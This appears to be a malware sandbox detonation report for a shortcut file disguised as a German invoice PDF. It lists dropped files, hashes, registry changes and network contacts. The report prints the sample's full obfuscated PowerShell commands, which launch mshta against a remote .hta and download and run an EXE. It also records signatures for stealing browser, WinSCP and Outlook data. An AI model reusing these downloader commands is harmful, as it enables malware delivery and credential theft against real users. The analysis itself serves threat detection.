"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $a='48aAs.69edS3b/:15u2vtmrpL0-7h'; &(-join($a[(-648+652),(169-167),(990-966)])) ^[ (-join($a[(-648+652),(169-167),(990-966)])); ^[ /# (-join($a[(-476+497),(-648+652),(-158+186),(-824+844),(169-167)])); foreach($z in @((-105+133),(-426+446),(575-555),(173-150),(-217+221),(-509+523),(524-511),(711-698),(210-187),(-471+488),(-724+736),(-668+694),(-606+622),(-351+363),(906-899),(-719+737),(899-881),(166-155),(387-375),(-188+203),(-604+616),(783-776),(-378+386),(775-748),(660-660),(995-993),(803-776),(-863+888),(-920+932),(333-325),(994-976),(559-541),(700-698),(835-810),(-958+959),(425-410),(-411+417),(686-684),(-963+964),(569-557),(934-907),(861-853),(-724+726),(950-941),(494-489),(-470+492),(-789+807),(805-800),(-232+241),(-603+611),(1008-989),(-242+255),(-653+668),(-705+723),(580-569),(-536+541),(986-958),(736-716),(-368+370))){$m+=$a[$z]}; /# $m;
C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev/123.hta
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hQzEzFacg($guorUJ, $OIoEigYq){[IO.File]::WriteAllBytes($guorUJ, $OIoEigYq)};function uuuOHRemK($guorUJ){if($guorUJ.EndsWith((ijnaJnaV @(5036,5090,5098,5098))) -eq $True){Start-Process (ijnaJnaV @(5104,5107,5100,5090,5098,5098,5041,5040,5036,5091,5110,5091)) $guorUJ}else{Start-Process $guorUJ}};function xlptFHdqR($FSYzd){$EBqZdo = New-Object (ijnaJnaV @(5068,5091,5106,5036,5077,5091,5088,5057,5098,5095,5091,5100,5106));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OIoEigYq = $EBqZdo.DownloadData($FSYzd);return $OIoEigYq};function ijnaJnaV($UxikGUX){$MKUYRJP=4990;$VRwScE=$Null;foreach($NymBWJi in $UxikGUX){$VRwScE+=[char]($NymBWJi-$MKUYRJP)};return $VRwScE};function TQiKbyGz(){$vXhNEzkB = $env:APPDATA + '\';$WRrNymqB = xlptFHdqR (ijnaJnaV @(5094,5106,5106,5102,5105,5048,5037,5037,5102,5107,5088,5035,5043,5088,5047,5040,5040,5041,5088,5039,5088,5047,5091,5045,5042,5087,5045,5038,5088,5091,5040,5040,5087,5038,5046,5039,5044,5087,5046,5088,5045,5091,5087,5090,5036,5104,5040,5036,5090,5091,5108,5037,5059,5078,5056,5072,5072,5076,5071,5074,5036,5091,5110,5091));$AvKehPB = $vXhNEzkB + 'EXBRRVQT.exe';hQzEzFacg $AvKehPB $WRrNymqB;uuuOHRemK $AvKehPB;;;;}TQiKbyGz;
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | udp |
| US | 162.159.140.237:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 162.159.140.237:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 23.192.22.93:80 | www.microsoft.com | tcp |
Files
memory/2580-38-0x000007FEF61BE000-0x000007FEF61BF000-memory.dmp
memory/2580-39-0x000000001B630000-0x000000001B912000-memory.dmp
memory/2580-40-0x0000000001F40000-0x0000000001F48000-memory.dmp
memory/2580-41-0x000007FEF5F00000-0x000007FEF689D000-memory.dmp
memory/2580-42-0x000007FEF5F00000-0x000007FEF689D000-memory.dmp
memory/2580-43-0x000007FEF5F00000-0x000007FEF689D000-memory.dmp
memory/2580-45-0x0000000002BDB000-0x0000000002C42000-memory.dmp
memory/2580-44-0x000007FEF5F00000-0x000007FEF689D000-memory.dmp
memory/2488-61-0x000000001B630000-0x000000001B912000-memory.dmp
memory/2488-62-0x0000000001D20000-0x0000000001D28000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-14 20:00
Reported
2024-11-14 20:02
Platform
win7-20240708-en
Max time kernel
117s
Max time network
127s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Windows\system32\mshta.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Windows\system32\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Rechnung_2024_0093.pdf.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $a='48aAs.69edS3b/:15u2vtmrpL0-7h'; &(-join($a[(-648+652),(169-167),(990-966)])) ^[ (-join($a[(-648+652),(169-167),(990-966)])); ^[ /# (-join($a[(-476+497),(-648+652),(-158+186),(-824+844),(169-167)])); foreach($z in @((-105+133),(-426+446),(575-555),(173-150),(-217+221),(-509+523),(524-511),(711-698),(210-187),(-471+488),(-724+736),(-668+694),(-606+622),(-351+363),(906-899),(-719+737),(899-881),(166-155),(387-375),(-188+203),(-604+616),(783-776),(-378+386),(775-748),(660-660),(995-993),(803-776),(-863+888),(-920+932),(333-325),(994-976),(559-541),(700-698),(835-810),(-958+959),(425-410),(-411+417),(686-684),(-963+964),(569-557),(934-907),(861-853),(-724+726),(950-941),(494-489),(-470+492),(-789+807),(805-800),(-232+241),(-603+611),(1008-989),(-242+255),(-653+668),(-705+723),(580-569),(-536+541),(986-958),(736-716),(-368+370))){$m+=$a[$z]}; /# $m;
C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev/123.hta
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hQzEzFacg($guorUJ, $OIoEigYq){[IO.File]::WriteAllBytes($guorUJ, $OIoEigYq)};function uuuOHRemK($guorUJ){if($guorUJ.EndsWith((ijnaJnaV @(5036,5090,5098,5098))) -eq $True){Start-Process (ijnaJnaV @(5104,5107,5100,5090,5098,5098,5041,5040,5036,5091,5110,5091)) $guorUJ}else{Start-Process $guorUJ}};function xlptFHdqR($FSYzd){$EBqZdo = New-Object (ijnaJnaV @(5068,5091,5106,5036,5077,5091,5088,5057,5098,5095,5091,5100,5106));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OIoEigYq = $EBqZdo.DownloadData($FSYzd);return $OIoEigYq};function ijnaJnaV($UxikGUX){$MKUYRJP=4990;$VRwScE=$Null;foreach($NymBWJi in $UxikGUX){$VRwScE+=[char]($NymBWJi-$MKUYRJP)};return $VRwScE};function TQiKbyGz(){$vXhNEzkB = $env:APPDATA + '\';$WRrNymqB = xlptFHdqR (ijnaJnaV @(5094,5106,5106,5102,5105,5048,5037,5037,5102,5107,5088,5035,5043,5088,5047,5040,5040,5041,5088,5039,5088,5047,5091,5045,5042,5087,5045,5038,5088,5091,5040,5040,5087,5038,5046,5039,5044,5087,5046,5088,5045,5091,5087,5090,5036,5104,5040,5036,5090,5091,5108,5037,5059,5078,5056,5072,5072,5076,5071,5074,5036,5091,5110,5091));$AvKehPB = $vXhNEzkB + 'EXBRRVQT.exe';hQzEzFacg $AvKehPB $WRrNymqB;uuuOHRemK $AvKehPB;;;;}TQiKbyGz;
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | udp |
| US | 172.66.0.235:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 172.66.0.235:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.252.157:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 23.192.22.93:80 | www.microsoft.com | tcp |
Files
memory/2804-38-0x000007FEF596E000-0x000007FEF596F000-memory.dmp
memory/2804-39-0x000007FEF56B0000-0x000007FEF604D000-memory.dmp
memory/2804-40-0x000000001B6F0000-0x000000001B9D2000-memory.dmp
memory/2804-41-0x0000000002290000-0x0000000002298000-memory.dmp
memory/2804-42-0x000007FEF56B0000-0x000007FEF604D000-memory.dmp
memory/2804-43-0x000007FEF56B0000-0x000007FEF604D000-memory.dmp
memory/2804-44-0x000007FEF56B0000-0x000007FEF604D000-memory.dmp
memory/2804-45-0x000007FEF56B0000-0x000007FEF604D000-memory.dmp
memory/1140-61-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
memory/1140-62-0x0000000001D90000-0x0000000001D98000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-14 20:00
Reported
2024-11-14 20:02
Platform
win10v2004-20241007-en
Max time kernel
131s
Max time network
147s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{3553DFEA-0E14-48EA-985C-867D5C26F859}\.cr\EXBRRVQT.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
Loads dropped DLL
Reads WinSCP keys stored on the system
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1344 set thread context of 632 | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | C:\Windows\SysWOW64\cmd.exe |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{3553DFEA-0E14-48EA-985C-867D5C26F859}\.cr\EXBRRVQT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Rechnung_2024_0093.pdf.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $a='48aAs.69edS3b/:15u2vtmrpL0-7h'; &(-join($a[(-648+652),(169-167),(990-966)])) ^[ (-join($a[(-648+652),(169-167),(990-966)])); ^[ /# (-join($a[(-476+497),(-648+652),(-158+186),(-824+844),(169-167)])); foreach($z in @((-105+133),(-426+446),(575-555),(173-150),(-217+221),(-509+523),(524-511),(711-698),(210-187),(-471+488),(-724+736),(-668+694),(-606+622),(-351+363),(906-899),(-719+737),(899-881),(166-155),(387-375),(-188+203),(-604+616),(783-776),(-378+386),(775-748),(660-660),(995-993),(803-776),(-863+888),(-920+932),(333-325),(994-976),(559-541),(700-698),(835-810),(-958+959),(425-410),(-411+417),(686-684),(-963+964),(569-557),(934-907),(861-853),(-724+726),(950-941),(494-489),(-470+492),(-789+807),(805-800),(-232+241),(-603+611),(1008-989),(-242+255),(-653+668),(-705+723),(580-569),(-536+541),(986-958),(736-716),(-368+370))){$m+=$a[$z]}; /# $m;
C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev/123.hta
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hQzEzFacg($guorUJ, $OIoEigYq){[IO.File]::WriteAllBytes($guorUJ, $OIoEigYq)};function uuuOHRemK($guorUJ){if($guorUJ.EndsWith((ijnaJnaV @(5036,5090,5098,5098))) -eq $True){Start-Process (ijnaJnaV @(5104,5107,5100,5090,5098,5098,5041,5040,5036,5091,5110,5091)) $guorUJ}else{Start-Process $guorUJ}};function xlptFHdqR($FSYzd){$EBqZdo = New-Object (ijnaJnaV @(5068,5091,5106,5036,5077,5091,5088,5057,5098,5095,5091,5100,5106));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OIoEigYq = $EBqZdo.DownloadData($FSYzd);return $OIoEigYq};function ijnaJnaV($UxikGUX){$MKUYRJP=4990;$VRwScE=$Null;foreach($NymBWJi in $UxikGUX){$VRwScE+=[char]($NymBWJi-$MKUYRJP)};return $VRwScE};function TQiKbyGz(){$vXhNEzkB = $env:APPDATA + '\';$WRrNymqB = xlptFHdqR (ijnaJnaV @(5094,5106,5106,5102,5105,5048,5037,5037,5102,5107,5088,5035,5043,5088,5047,5040,5040,5041,5088,5039,5088,5047,5091,5045,5042,5087,5045,5038,5088,5091,5040,5040,5087,5038,5046,5039,5044,5087,5046,5088,5045,5091,5087,5090,5036,5104,5040,5036,5090,5091,5108,5037,5059,5078,5056,5072,5072,5076,5071,5074,5036,5091,5110,5091));$AvKehPB = $vXhNEzkB + 'EXBRRVQT.exe';hQzEzFacg $AvKehPB $WRrNymqB;uuuOHRemK $AvKehPB;;;;}TQiKbyGz;
C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe
"C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe"
C:\Windows\Temp\{3553DFEA-0E14-48EA-985C-867D5C26F859}\.cr\EXBRRVQT.exe
"C:\Windows\Temp\{3553DFEA-0E14-48EA-985C-867D5C26F859}\.cr\EXBRRVQT.exe" -burn.clean.room="C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe" -burn.filehandle.attached=544 -burn.filehandle.self=528
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\ActiveISO.exe
"C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\ActiveISO.exe"
C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | udp |
| US | 162.159.140.237:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.140.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.21.192.23.in-addr.arpa | udp |
| US | 162.159.140.237:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sirnisirlo.online | udp |
| US | 172.67.214.86:443 | sirnisirlo.online | tcp |
| US | 8.8.8.8:53 | 86.214.67.172.in-addr.arpa | udp |
Files
memory/4560-2-0x00007FFE71FB3000-0x00007FFE71FB5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5wlcbxwn.d5f.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4560-12-0x0000015C6E8F0000-0x0000015C6E912000-memory.dmp
memory/4560-13-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp
memory/4560-14-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp
memory/4560-17-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 75b4b2eecda41cec059c973abb1114c0 |
| SHA1 | 11dadf4817ead21b0340ce529ee9bbd7f0422668 |
| SHA256 | 5540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134 |
| SHA512 | 87feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626 |
C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe
| MD5 | b6ab13b3b9903bf84327737ba227bab3 |
| SHA1 | 65dff8665b502ba33f3effb8430263e4f906c1c0 |
| SHA256 | baa56e574d8deed445d0e58487add9d429d60bbb1b39943c581bcf50e9bd91d6 |
| SHA512 | 6f6ec1217e14f96a52cfa314327a09bfe74199fa0a85d94f0bd5381a0af7c96ac26ba8b5506663f76473c0714609c80d58cb86bde73888cfd6ea15060793f5c7 |
C:\Windows\Temp\{3553DFEA-0E14-48EA-985C-867D5C26F859}\.cr\EXBRRVQT.exe
| MD5 | eb26dfa5e4e3170d90b5629df0715aa9 |
| SHA1 | bbc10367aa29aa36a6e53c63b60a6936bc6f1720 |
| SHA256 | 70721a20760818839c7ef0ce2d684666bd07bbb79b87415944c6efbce58f7906 |
| SHA512 | 11e2683c8f47c62548050f863386e62908c5dd7e456ca13c22644ecb984533d3abdd72d1fd5a3ac53c1b2734e5999554d383f3f5c615d4c94c4c169664787bf9 |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\Helicoid.dll
| MD5 | a9c5977784daf8cebe8408a8b6db3fbe |
| SHA1 | 8ae8d67007cdca9acf96681ffa6200e5847972de |
| SHA256 | 63f5a34563b62de3dffa57401d7225f4687933cef250b78b995eee813c862fad |
| SHA512 | 886fbea2c959ce4245185d1dcec3efcfbb50a71840c964d4fd8e0a46f7fbf8afbf7445bc2d892789f25124b862912fb0c3556c5004a7e6ddb4ee13b87cf58a65 |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\ActiveISO.exe
| MD5 | b84dfabe933d1160f624693d94779ce5 |
| SHA1 | ac0133c09708fe4a3c626e3ba4cdf44d3a0e065f |
| SHA256 | 588cb61b36a001384a2833bd5df8d7982ca79d6ae17a3d83a94e01b1e79684bd |
| SHA512 | eeaeef8d6b5fa02dedf9818babaa4b5ffdb87300521883aa290289dcc720b3d543279085ed3fc649b74654143e678502e56eb3f92c4baf53c075977de33c1b0e |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\Qt5Widgets.dll
| MD5 | c502bb8a4a7dc3724ab09292cd3c70d6 |
| SHA1 | ff44fddeec2d335ec0eaa861714b561f899675fd |
| SHA256 | 4266918226c680789d49cf2407a7fec012b0ed872adafb84c7719e645f9b2e6d |
| SHA512 | 73bef89503ce032fba278876b7dab9eac275632df7a72c77093d433c932272da997e8fbeb431a09d84baac7b2ab2e55222ff687893311949a5603e738bfa6617 |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\vcruntime140_1.dll
| MD5 | 75e78e4bf561031d39f86143753400ff |
| SHA1 | 324c2a99e39f8992459495182677e91656a05206 |
| SHA256 | 1758085a61527b427c4380f0c976d29a8bee889f2ac480c356a3f166433bf70e |
